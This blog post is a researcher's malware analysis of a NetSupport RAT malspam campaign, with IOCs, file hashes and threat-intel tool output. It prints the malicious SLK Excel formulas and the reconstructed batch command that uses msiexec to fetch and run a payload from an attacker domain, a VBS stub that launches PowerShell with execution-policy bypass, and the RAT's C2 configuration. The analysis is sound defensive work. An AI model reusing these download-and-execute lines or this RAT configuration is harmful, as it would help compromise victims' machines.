{"id":1364,"date":"2020-05-29T03:31:40","date_gmt":"2020-05-29T02:31:40","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=1364"},"modified":"2022-04-30T22:11:10","modified_gmt":"2022-05-01T03:11:10","slug":"2020-05-27-netwire-malspam","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1364","title":{"rendered":"2020-05-27 Netsupport RAT Malspam"},"content":{"rendered":"

Summary
\n========<\/p>\n

Yesterday when reviewing the spam filters I found an email with a malicious attachment (.slk file) that setups the system to be infected with what looks to be a NetSupport RAT (based on the information found in the PCAP). I Checked the usual OSINT resources (ie: Hybrid Analysis, Malshare, MalwareBazaar, Anyrun, URLHaus, VT) for the hash of the attachment. Unfortunately there were no hits or results found. The initial link also had no hits yesterday either. The only hit from this malware was for the IP address 207.148.12.140 but that was in the forms of passive DNS results. Using Munin to look at all the captured files that I could get off my VM, I did get some hits as seen in the section labeled “Munin results.”<\/p>\n

The artifacts for this malware can be found at my Github located here<\/a>.<\/p>\n

Analysis
\n========<\/p>\n

As stated above, the maldoc arrived via email as an attachment. A simple examination of this Excel file gives us some hints about the nature of it and what it was trying to achieve. Using strings on the file I was able to see the initial callout to the first domain (almostkabalnews[.]com\/contact.php) and some other information as well.<\/p>\n

\r\nNN;Nauto_open;ER101C1\r\nC;Y76;X1;K"RPens"\r\nF;Y284\r\nC;K33;EEXEC("cmd.exe \/c EchO| set \/p=""@echo off&amp;Msie^xec \/ih^tt^p^:^\/\/almostakba""&gt;%appdata%\\RPens.bat")\r\nF;Y285\r\nC;K33;EEXEC("cmd.exe \/c @echo off&amp;ping 1&amp;EcHo|s^et \/p=""lnews.com\/contact.php ^\/q""&gt;&gt;%appdata%\\RPens.bat&amp;%appdata%\\RPens.bat")\r\n\r\n...\r\n\r\nC;K"To display this document you must Enable Content"\r\n<\/pre>\n
Based on further analysis and some help from ProcMon, the infection starts with the following command being reconstructed:<\/p>\n
\r\ncmd.exe  \/S \/D \/c" set \/p="lnews.com\/contact.php ^\/q" 1&gt;&gt;C:\\Users\\Bill\\AppData\\Roaming\\RPens.bat"\r\n<\/pre>\n
The contents of the batch file (RPens.bat) that gets dropped into the %APPDATA% folder is:<\/p>\n
\r\n@echo off&amp;Msie^xec \/ih^tt^p^:^\/\/almostakbalnews.com\/contact.php ^\/q\r\n<\/pre>\n
From here, a MSIEXEC process reaches out to the domain and kicks off the download of the file from that site.<\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n
Once the MSIEXEC process finished downloading the file, another MSIEXEC process was created and the extraction of a cab file (which is really the file called 1.exe) was written to the filesystem (C:\\Users\\Bill\\AppData\\Local\\Temp\\MW-d31eab32-09d9-4bb5-afca-5821b16e764b\\files\\1.exe). From here, as seen in the image above, the 1.exe file called cmd.exe to create a PoSH script (installations.ps1) via a VBS script (NKYPBRXYDZ.vbs) in the %TEMP% directory. This also manages to delete the VB script as well. The VB script is nothing special as seen here:<\/p>\n
\r\nCreaTeObjecT("WscRipt.SHeLl").Run "cmd \/c powershell -ep bypass -f C:\\Users\\Bill\\AppData\\Local\\Temp\\installations.ps1", 0, False \r\n<\/pre>\n
The PoSH script on the other hand was interesting. The script was a heavy 5.6MB large with the bulk of the script being in base64 encoding. The entire script can be found here: http:\/\/gist.github.com\/herbiezimmerman\/9871507dae62713f5ae4a50064b7af9c<\/a>. In order to deobfuscate the script, all I did was replace the “Invoke-Expression $NFTOOGKSDU” statement to “write-host $NFTOOGKSDU” and executed that in Powershell ISE. The following is the deobfuscated code of the above script: http:\/\/gist.github.com\/herbiezimmerman\/8f7f8cd71c1da5c8ce19b5ea6c8c7e4c<\/a>. As seen in that large wall of deobfuscated code, the script reads the data in from base64, decompresses it via gzip, and then wrote it to a file called “str.txt” (which I could not find in the ProcMon logs), and then created the files via a byte array in a randomly generated folder name in the %APPDATA% folder. Persistence for this malware was also written into the registry key located at HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run pointing to the file called “dwm.exe” in the “%APPDATA%\\Roaming\\\\” folder.<\/p>\n
\"\"<\/a><\/p>\n
Once the “dwm.exe” process is up and running, it started calling out and is the process responsible for the calls made to the the IPs found above.<\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n
**NOTE: On another execution of the malware, I noticed that there was a folder called “NetSupport” under the “C:\\Users\\Bill\\AppData\\Local\\” path. In this folder was another folder called “NetSupport Manager” with nothing in it. Looking at the ProcMon results, I did not see this folder being created.<\/p>\n
Update – 2020-05-30:<\/strong> After posting this on Twitter<\/a> and tagging several other researchers, @JAMESWT_MHT<\/a> brought up something that I failed to outline here in the post – the file “client32.ini” is part of the NetSupport Agent along with some of the other files dropped on to the system. While looking more into the NetSupport application, I came across a KB article<\/a> talking about the “client32.ini” file. From the looks of it this is an older version of the application (pre-v12.50 Clients). For some more information about the settings below, check out the vendor’s site here<\/a>. The contents of the “client32.ini” file is below:<\/p>\n
\r\n0x8f4d8fb4\r\n\r\n[Client]\r\n_present=1\r\nAlwaysOnTop=1\r\nDisableChat=1\r\nDisableChatMenu=1\r\nDisableClientConnect=1\r\nDisableCloseApps=0\r\nDisableDisconnect=1\r\nDisableManageServices=0\r\nDisableReplayMenu=1\r\nDisableRequestHelp=1\r\nHideWhenIdle=1\r\nProtocols=3\r\nRoomSpec=Eval\r\nsilent=1\r\nSysTray=0\r\nUnloadMirrorOnDisconnect=1\r\nUsernames=*\r\n\r\n[_Info]\r\nFilename=C:\\Program Files\\NetSupport\\NetSupport Manager\\client32.ini\r\n\r\n[_License]\r\nquiet=1\r\n\r\n[Audio]\r\nDisableAudioFilter=1\r\n\r\n[Bridge]\r\nModem=SSTP\r\n\r\n[General]\r\nBeepUsingSpeaker=0\r\n\r\n[HTTP]\r\nGatewayAddress=calltaxisoftware.com:443\r\n\r\n\r\nGSK=FL;O@OFC:M@KDAGC:I\r\n<\/pre>\n
Whois info for the domain “calltaxisoftware[.]com.”<\/p>\n
\r\nRegistrant\tWhoisGuard Protected\r\nRegistrant Org\tWhoisGuard, Inc.\r\nRegistrant Country\tpa\r\nRegistrar\tNAMECHEAP INC NameCheap, Inc.\r\nIANA ID: 1068\r\nURL: http:\/\/www.namecheap.com\r\nWhois Server: whois.namecheap.com\r\n\r\n(p)\r\nRegistrar Status\taddPeriod, clientTransferProhibited\r\nDates\t8 days old\r\nCreated on 2020-05-22\r\nExpires on 2021-05-22\r\nUpdated on 0000-12-31\t  \r\nName Servers\tDNS1.REGISTRAR-SERVERS.COM (has 6,044,895 domains)\r\nDNS2.REGISTRAR-SERVERS.COM (has 6,044,895 domains)\r\n  \r\nTech Contact\tWhoisGuard Protected\r\nWhoisGuard, Inc.\r\nP.O. Box 0823-03411,\r\nPanama, Panama, pa\r\n\r\n(p) (f)\r\nIP Address\t88.119.171.110 is hosted on a dedicated server\r\n  \r\nIP Location\tLithuania - Siauliu Apskritis - Siauliai - Informacines Sistemos Ir Technologijos Uab\r\nASN\tLithuania AS61272 IST-AS, LT (registered Dec 12, 2012)\r\nDomain Status\tRegistered And Active Website\r\nIP History\t7 changes on 7 unique IP addresses over 6 years\t  \r\nRegistrar History\t1 registrar with 1 drop\t  \r\nHosting History\t4 changes on 4 unique name servers over 6 years\r\n<\/pre>\n
So while the callback is listed as HTTPS (443) it is just plain HTTP and not encrypted traffic as one would expect. Looking at some of the other INI files, it was seen that this looks like it was licensed back on 21\/03\/2018 at 11:54 and that this is licensed to “EVALUSION” with what appears to be upwards of 5000 hosts being controlled based on the NSM.lic file (see below). The license for this is “NSM165348.”<\/p>\n
\r\n1200\r\n0x3bcb348e\r\n\r\n; NetSupport License File.\r\n; Generated on 11:54 - 21\/03\/2018\r\n\r\n\r\n\r\n[[Enforce]]\r\n\r\n[_License]\r\ncontrol_only=0\r\nexpiry=\r\ninactive=0\r\nlicensee=EVALUSION\r\nmaxslaves=5000\r\nos2=1\r\nproduct=10\r\nserial_no=NSM165348\r\nshrink_wrap=0\r\ntransport=0\r\n<\/pre>\n
Looking at the NSM.ini file, this looks to be a generic setup with nothing that stood out to me outside of the “client=1” setting.<\/p>\n
\r\n\r\n[General]\r\nClientParams=\r\nCLIENT32=\r\nInstalldir=\r\nNOARP=\r\nSuppressAudio=\r\n\r\n\r\n[Features]\r\nClient=1\r\nConfigurator=\r\nControl=\r\nGateway=\r\nPINServer=\r\nRemoteDeploy=\r\nScripting=\r\nStudent=\r\nTechConsole=\r\nTutor=\r\n\r\n\r\n[StartMenuIcons]\r\nClientIcon=\r\nConfigIcon=\r\nControlIcon=\r\nRemoteDeployIcon=\r\nScriptingIcon=\r\nTechConsoleIcon=\r\nTutorIcon=\r\n\r\n\r\n[DesktopIcons]\r\nControlDeskIcon=\r\nTechConsoleDeskIcon=\r\nTutorDeskIcon=\r\n\r\n\r\n\r\n\r\n\r\n; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.\r\n\r\n; Client=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          Client=1\r\n;          Controls whether the client component is installed (1) on the target machine or not (Blank)\r\n;\r\n\r\n; CLIENT32=&lt;blank\/not blank&gt;\r\n; e.g.\r\n;\t   CLIENT32=\r\n;\t   Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic\r\n;\r\n\r\n; ClientIcon=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          ClientIcon=1\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Item "Reset Video Driver"\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; ClientParams=\r\n;\r\n;\t   Advanced users only, please see documentation for advice\r\n;\r\n\r\n; Configurator=&lt;1\/Blank&gt;\r\n; e.g. \r\n;          Configurator=1\r\n;          Controls whether the student client configuration application is installed (1) on the target machine or not (Blank)\r\n;\r\n\r\n; ConfigIcon=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          ConfigIcon=1\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Items "Manager Configurator" and "School Configurator"\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; Control=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          Control=1\r\n;          Controls whether the control component is installed (1) on the target machine or not (Blank)\r\n;\r\n\r\n; ControlDeskIcon=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          ControlDeskIcon=1\r\n;          Controls whether shortcut icons for the control application (1) is placed on the target machine\u2019s desktop or not (Blank)\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; ControlIcon=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          ControlIcon=1\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Items "Control" and "Video Player"\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; Gateway=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          Gateway=\r\n;          Controls whether the gateway component is installation on the target machine (1) or not (Blank)\r\n;\r\n\r\n; PINServer=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          PINServer=\r\n;          Controls whether the PINServer component is installation on the target machine (1) or not (Blank)\r\n;\r\n\r\n; Installdir=&lt;driveletter:path&gt;\r\n; e.g. \r\n;          Installdir=e:\\my dir1\\my dir2\\\r\n;\r\n;          Determines the drive and directory where the product will be installed. \r\n;          No quotes are required, normal Windows directory naming restrictions apply.\r\n;\r\n\r\n; NOARP=&lt;1\/Blank&gt;\r\n; e.g. \r\n;          NOARP=1\r\n;\r\n;          Hides the entry in Add\/Remove programs (1), thus preventing uninstall from the Control Panel\r\n;\r\n\r\n; RemoteDeploy=&lt;1\/Blank&gt;\r\n; e.g\r\n;          RemoteDeploy=1\r\n;          Controls whether the remote deployment application is installed on the target machine (1) or not (Blank)\r\n;\r\n\r\n; RemoteDeployIcon=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          RemoteDeployIcon=1\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Item "Deploy"\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; Scripting=&lt;1\/Blank&gt;\r\n; e.g\r\n;          Scripting=\r\n;          Controls whether the Scripting component is installed (1) or not (Blank)\r\n;\r\n\r\n; ScriptingIcon=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          ScriptingIcon=1\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Items "Script Agent", "Script Editor" and "Run Script"\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; Student=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          Student=\r\n;          Controls whether the student component is installed (1) on the target machine or not (Blank)\r\n;          Only applicable if the Client component is installed at the same time.\r\n;\r\n\r\n; SuppressAudio=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          SuppressAudio=1\r\n;          Prevents installation of Audio Capture component on Win 2000, XP and 2003\r\n;\r\n\r\n; TechConsole =&lt;1\/Blank&gt;\r\n; e.g.\r\n;          TechConsole=\r\n;          Controls whether the TechConsole component is installed (1) on the target machine or not (Blank)\r\n;          Only applicable if the Control component is installed at the same time.\r\n;\r\n\r\n; TechConsoleDeskIcon=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          TechConsoleDeskIcon=\r\n;          Controls whether shortcut icons for the school techConsole application (1) is placed on the target machine\u2019s desktop or not (Blank)\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; TechConsoleIcon=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          TechConsoleIcon=\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Item "TechConsole"\r\n;          Only applicable if the relevant component is installed at the same time.\r\n;\r\n\r\n; Tutor =&lt;1\/Blank&gt;\r\n; e.g.\r\n;          Tutor=\r\n;          Controls whether the Tutor component is installed (1) on the target machine or not (Blank)\r\n;          Only applicable if the Control component is installed at the same time.\r\n;\r\n\r\n; TutorDeskIcon=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          TutorDeskIcon=\r\n;          Controls whether shortcut icons for the school tutor application (1) is placed on the target machine\u2019s desktop or not (Blank)\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; TutorIcon=&lt;1\/Blank&gt;\r\n; e.g.\r\n;          TutorIcon=\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Items "Annotate", "Test Designer", "Power On Machines" and "Tutor"\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n<\/pre>\n
Artifacts
\n==========<\/p>\n
IOCs
\n—–<\/p>\n
almostkabalnews[.]com\/contact[.]php – 207[.]148[.]12[.]140 (TCP)
\ngeo[.]netsupportsoftware[.]com\/location\/loca[.]asp (TCP) – 195[.]171[.]92[.]116
\nPOST http:\/\/88[.]119[.]171[.]110\/fakeurl[.]htm (TCP) – calltaxisoftware.com (DNS request\/response)<\/p>\n
File hashes
\n————<\/p>\n
3b5824e206c06d3f3a2f081955588d01987de801aed234be5183ec620f0d407f — NKYPBRXYDZ.vbs
\nb96e85f9862ef4b4eee656a4fa9dffd577ab7f16370e264de43b5914853b8e0b — MSIa96e0.LOG
\n053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae — nso59B9.tmp\/blowfish.dll
\nea205cf31b12a1062ebd6b7220b10b8a19229181a32778ec7030d4f1ce74f239 — 2020-05-27-malspam-attachment.slk
\n2add4e3f9acd88b53c97989b309bccdf35456c444d7b4436bd0b9b04f1d16cf4 — installations.ps1
\n34a4871259f22fea2170acee8d7053886d2802663957cac206d6bba6be54e93d — MW-98f95b26-4e55-464c-97c7-49d725ed6549\/msiwrapper.ini
\n5cd1dd897ca53631351db99484b62dd7f35c4a3539298638f4cfea42880c7ec7 — MW-98f95b26-4e55-464c-97c7-49d725ed6549\/files.cab
\nc6b8ab9afb68f49a188765fe6bf2a71d2bbc6a53b4cd2d6cd0521f5df5e762a2 — MW-98f95b26-4e55-464c-97c7-49d725ed6549\/files\/1.exe
\n9f3cd0c5b9c3fd571e2da5b9feb9f05a7a969aeb77d3c54dfcc0d0226f3d5f9f — RPens.bat
\n63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 — kAP5fmXg\/PCICL32.DLL
\nedfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 — kAP5fmXg\/HTCTL32.DLL
\n60fe386112ad51f40a1ee9e1b15eca802ced174d7055341c491dee06780b3f92 — kAP5fmXg\/NSM.ini
\n8ad9c598c1fde52dd2bfced5f953ca0d013b0c65feb5ded73585cfc420c95a95 — kAP5fmXg\/remcmdstub.exe
\n49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 — kAP5fmXg\/dwm.exe
\n8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 — kAP5fmXg\/msvcr100.dll
\n9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 — kAP5fmXg\/pcicapi.dll
\n2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12 — kAP5fmXg\/NSM.lic
\nd96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368 — kAP5fmXg\/nskbfltr.inf
\n9cf77e6862951486de61abe93ea66ceb21c807853480febb1cb0656970844be9 — kAP5fmXg\/client32.ini
\n313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a — kAP5fmXg\/PCICHEK.DLL<\/p>\n
Machinae results
\n—————–<\/p>\n
[.] Requesting http:\/\/www.ipvoid.com\/ip-blacklist-check (POST)
\n[.] Requesting http:\/\/malc0de.com\/database\/index.php?search=207.148.12.140 (GET)
\n[.] Requesting http:\/\/abuseipdb.com\/check\/207.148.12.140 (GET)
\n[.] Requesting http:\/\/ransomwaretracker.abuse.ch\/host\/207.148.12.140 (GET)
\n[.] Requesting http:\/\/isc.sans.edu\/api\/ip\/207.148.12.140 (GET)
\n[.] Requesting http:\/\/freegeoip.io\/json\/207.148.12.140 (GET)
\n[.] Requesting http:\/\/www.fortiguard.com\/webfilter?q=207.148.12.140 (GET)
\n[.] Requesting http:\/\/www.virustotal.com\/vtapi\/v2\/ip-address\/report?ip=207.148.12.140&apikey=xxx (GET)
\n[.] Requesting http:\/\/www.reputationauthority.org\/lookup.php?ip=207.148.12.140 (GET)
\n[.] Requesting http:\/\/www.mcafee.com\/threat-intelligence\/ip\/default.aspx?ip=207.148.12.140 (GET)
\n[.] Requesting http:\/\/www.threatcrowd.org\/searchApi\/v2\/ip\/report\/?ip=207.148.12.140 (GET)
\n[.] Requesting http:\/\/www.urlvoid.com\/scan\/almostakbalnews.com (GET)
\n[.] Requesting http:\/\/www.toolsvoid.com\/unshorten-url (POST)
\n[.] Requesting http:\/\/malc0de.com\/database\/index.php?search=almostakbalnews.com (GET)
\n[.] Requesting http:\/\/www.fortiguard.com\/webfilter?q=almostakbalnews.com (GET)
\n[.] Requesting http:\/\/www.virustotal.com\/vtapi\/v2\/domain\/report?domain=almostakbalnews.com&apikey=xxx (GET)
\n[.] Requesting http:\/\/www.reputationauthority.org\/lookup.php?ip=almostakbalnews.com (GET)
\n[.] Requesting http:\/\/www.mcafee.com\/threat-intelligence\/domain\/default.aspx?domain=almostakbalnews.com (GET)
\n[.] Requesting http:\/\/www.virustotal.com\/vtapi\/v2\/file\/report?apikey=xxx&resource=ea205cf31b12a1062ebd6b7220b10b8a19229181a32778ec7030d4f1ce74f239 (GET)
\n********************************************************************************
\n* Information for 207.148.12.140
\n* Observable type: ipv4 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites<\/p>\n
[-] No IPVoid Results
\n[-] No Malc0de Results
\n[-] No AbuseIPDB Results
\n[-] No RansomwareTracker Results
\n[-] No SANS Results
\n[+] Fortinet Category Results
\n[-] Fortinet URL Category: Not Rated
\n[+] VirusTotal pDNS Results
\n[-] pDNS data from VirusTotal: (‘2020-05-28’, ‘almostakbalnews[.]com’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2020-05-28’, ‘hXXp:\/\/almostakbalnews[.]com\/’)
\n[+] Reputation Authority Results
\n[-] Reputation Authority Score: 50\/100
\n[-] No McAfee Threat Results
\n[-] No ThreatCrowd IP Report Results
\n********************************************************************************
\n* Information for almostakbalnews.com
\n* Observable type: fqdn (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites<\/p>\n
[-] No URLVoid Results
\n[-] No URL Unshorten Results
\n[-] No Malc0de Results
\n[+] Fortinet Category Results
\n[-] Fortinet URL Category: News and Media
\n[+] VirusTotal pDNS Results
\n[-] pDNS data from VirusTotal: (‘2019-11-29’, ‘104[.]31.74.118’)
\n[-] pDNS data from VirusTotal: (‘2019-11-29’, ‘104[.]31.75.118’)
\n[-] pDNS data from VirusTotal: (‘2017-11-28’, ‘144[.]76.148.66’)
\n[-] pDNS data from VirusTotal: (‘2016-03-04’, ‘173[.]254.28.63’)
\n[-] pDNS data from VirusTotal: (‘2020-05-23’, ‘192[.]64.119.48’)
\n[-] pDNS data from VirusTotal: (‘2020-05-28’, ‘207[.]148.12.140’)
\n[-] pDNS data from VirusTotal: (‘2018-12-23’, ‘5[.]9.217.186’)
\n[-] pDNS data from VirusTotal: (‘2020-03-04′, ’91[.]195.240.94’)
\n[-] No Reputation Authority Results
\n[+] McAfee Threat Results
\n[-] McAfee Web Risk: Minimal
\n[-] McAfee Last Seen: 2020-05-27
\n********************************************************************************
\n* Information for ea205cf31b12a1062ebd6b7220b10b8a19229181a32778ec7030d4f1ce74f239
\n* Observable type: hash.sha256 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites<\/p>\n
Munin results
\n==============<\/p>\n
[+] Writing results to new file: check-results_munin.csv
\n[ ] Processing NKYPBRXYDZ.vbs …
\n[ ] Processing msiwrapper.ini …
\n[ ] Processing MSIa96e0.LOG …
\n[ ] Processing PCICL32.DLL …
\n[ ] Processing HTCTL32.DLL …
\n[ ] Processing NSM.ini …
\n[ ] Processing remcmdstub.exe …
\n[ ] Processing dwm.exe …
\n[ ] Processing msvcr100.dll …
\n[ ] Processing pcicapi.dll …
\n[ ] Processing 1.exe …
\n[ ] Processing NSM.lic …
\n[ ] Processing nskbfltr.inf …
\n[ ] Processing installations.ps1 …
\n[ ] Processing blowfish.dll …
\n[ ] Processing files.cab …
\n[ ] Processing client32.ini …
\n[ ] Processing RPens.bat …
\n[ ] Processing PCICHEK.DLL …
\n[+] Processing 19 lines …<\/p>\n
1 \/ 19 > Unknown
\nHASH: 3b5824e206c06d3f3a2f081955588d01987de801aed234be5183ec620f0d407f COMMENT: NKYPBRXYDZ.vbs
\nRESULT: – \/ –<\/p>\n
2 \/ 19 > Unknown
\nHASH: 34a4871259f22fea2170acee8d7053886d2802663957cac206d6bba6be54e93d COMMENT: msiwrapper.ini
\nRESULT: – \/ –<\/p>\n
3 \/ 19 > Unknown
\nHASH: b96e85f9862ef4b4eee656a4fa9dffd577ab7f16370e264de43b5914853b8e0b COMMENT: MSIa96e0.LOG
\nRESULT: – \/ –<\/p>\n
4 \/ 19 > Suspicious
\nHASH: 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 COMMENT: PCICL32.DLL
\nTYPE: Win32 DLL SIZE: 3.56 MB FILENAMES: pcicl32.dll, PCICL32.DLL, pcicl32.dll, pcicl32, PCICL32.xyz
\nSIGNER: NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign
\nFIRST: 2017-10-26 19:42:05 LAST: 2020-04-29 01:03:22 SUBMISSIONS: 20 REPUTATION: 0
\nCOMMENTS: 2 USERS: tines_bot, zbetcheckin TAGS: PEDLL SIGNED OVERLAY
\nRESULT: 2 \/ 71
\n[!] Sample on URLHaus URL: http:\/\/urlhaus-api.abuse.ch\/v1\/download\/63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8\/<\/a>
\n[!] URLHaus info TYPE: exe FIRST_SEEN: 2019-09-22 19:44:12 LAST_SEEN: 2019-09-27 18:51:36 URL_COUNT: 1
\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/KON998\/PCICL32.DLL
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8<\/a><\/p>\n
5 \/ 19 > Suspicious
\nHASH: edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 COMMENT: HTCTL32.DLL
\nTYPE: Win32 DLL SIZE: 320.37 KB FILENAMES: htctl32.dll, HTCTL32.DLL, htctl32.dll, htctl32, HTCTL32.xzi
\nSIGNER: NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign
\nFIRST: 2016-06-14 19:51:03 LAST: 2020-05-11 22:24:37 SUBMISSIONS: 17 REPUTATION: 0
\nCOMMENTS: 1 USERS: tines_bot TAGS: PEDLL SIGNED OVERLAY
\nRESULT: 1 \/ 71
\n[!] Signer – appeared 2 times in this batch b’NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign’
\n[!] Sample on URLHaus URL: http:\/\/urlhaus-api.abuse.ch\/v1\/download\/edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796\/<\/a>
\n[!] URLHaus info TYPE: exe FIRST_SEEN: 2019-09-22 19:44:04 LAST_SEEN: 2019-09-27 18:51:25 URL_COUNT: 1
\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/KON998\/HTCTL32.DLL
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796<\/a><\/p>\n
6 \/ 19 > Clean
\nHASH: 60fe386112ad51f40a1ee9e1b15eca802ced174d7055341c491dee06780b3f92 COMMENT: NSM.ini
\nTYPE: unknown SIZE: 6.31 KB FILENAMES: NSM.ini, NSM.ini, nsm.ini
\nFIRST: 2017-12-28 11:39:44 LAST: 2020-04-29 01:02:57 SUBMISSIONS: 7 REPUTATION: 0
\nCOMMENTS: 1 USERS: tines_bot TAGS:
\nRESULT: 0 \/ 59
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/60fe386112ad51f40a1ee9e1b15eca802ced174d7055341c491dee06780b3f92<\/a><\/p>\n
7 \/ 19 > Suspicious
\nHASH: 8ad9c598c1fde52dd2bfced5f953ca0d013b0c65feb5ded73585cfc420c95a95 COMMENT: remcmdstub.exe
\nVIRUS: McAfee: PUP-RemoteAdmin.a
\nTYPE: Win32 EXE SIZE: 62.37 KB FILENAMES: remcmdstub.exe, remcmdstub.exe, remcmdstub
\nSIGNER: NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign
\nFIRST: 2018-04-04 11:52:38 LAST: 2020-05-12 08:31:34 SUBMISSIONS: 14 REPUTATION: 0
\nCOMMENTS: 1 USERS: tines_bot TAGS: PEEXE SIGNED OVERLAY
\nRESULT: 3 \/ 72
\n[!] Signer – appeared 3 times in this batch b’NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign’
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/8ad9c598c1fde52dd2bfced5f953ca0d013b0c65feb5ded73585cfc420c95a95<\/a><\/p>\n
8 \/ 19 > Malicious
\nHASH: 49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 COMMENT: dwm.exe
\nVIRUS: Microsoft: PUA:Win32\/Presenoker \/ Kaspersky: not-a-virus:RemoteAdmin.Win32.NetSup.i \/ McAfee: PUP-RemoteAdmin.a
\nTYPE: Win32 EXE SIZE: 103.37 KB FILENAMES: client32.exe, client32, client32.exe, dwm.exe, presentationhost.exe, fonthost.exe, client32.xzi
\nSIGNER: NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign
\nFIRST: 2016-07-12 06:00:07 LAST: 2020-05-28 07:37:25 SUBMISSIONS: 44 REPUTATION: -19
\nCOMMENTS: 5 USERS: tines_bot, joesecurity, joesecurity, zbetcheckin, zbetcheckin TAGS: INVALID-SIGNATURE PEEXE SIGNED OVERLAY
\nRESULT: 12 \/ 71
\n[!] Signer – appeared 4 times in this batch b’NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign’
\n[!] Sample on URLHaus URL: http:\/\/urlhaus-api.abuse.ch\/v1\/download\/49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3\/<\/a>
\n[!] URLHaus info TYPE: exe FIRST_SEEN: 2019-09-22 19:44:20 LAST_SEEN: 2020-01-28 16:46:06 URL_COUNT: 3
\n[!] URLHaus STATUS: offline URL: http:\/\/aisioy.xyz\/11\/client32.exe
\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/K01\/client32.exe
\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/KON998\/client32.exe
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3<\/a><\/p>\n
9 \/ 19 > Clean
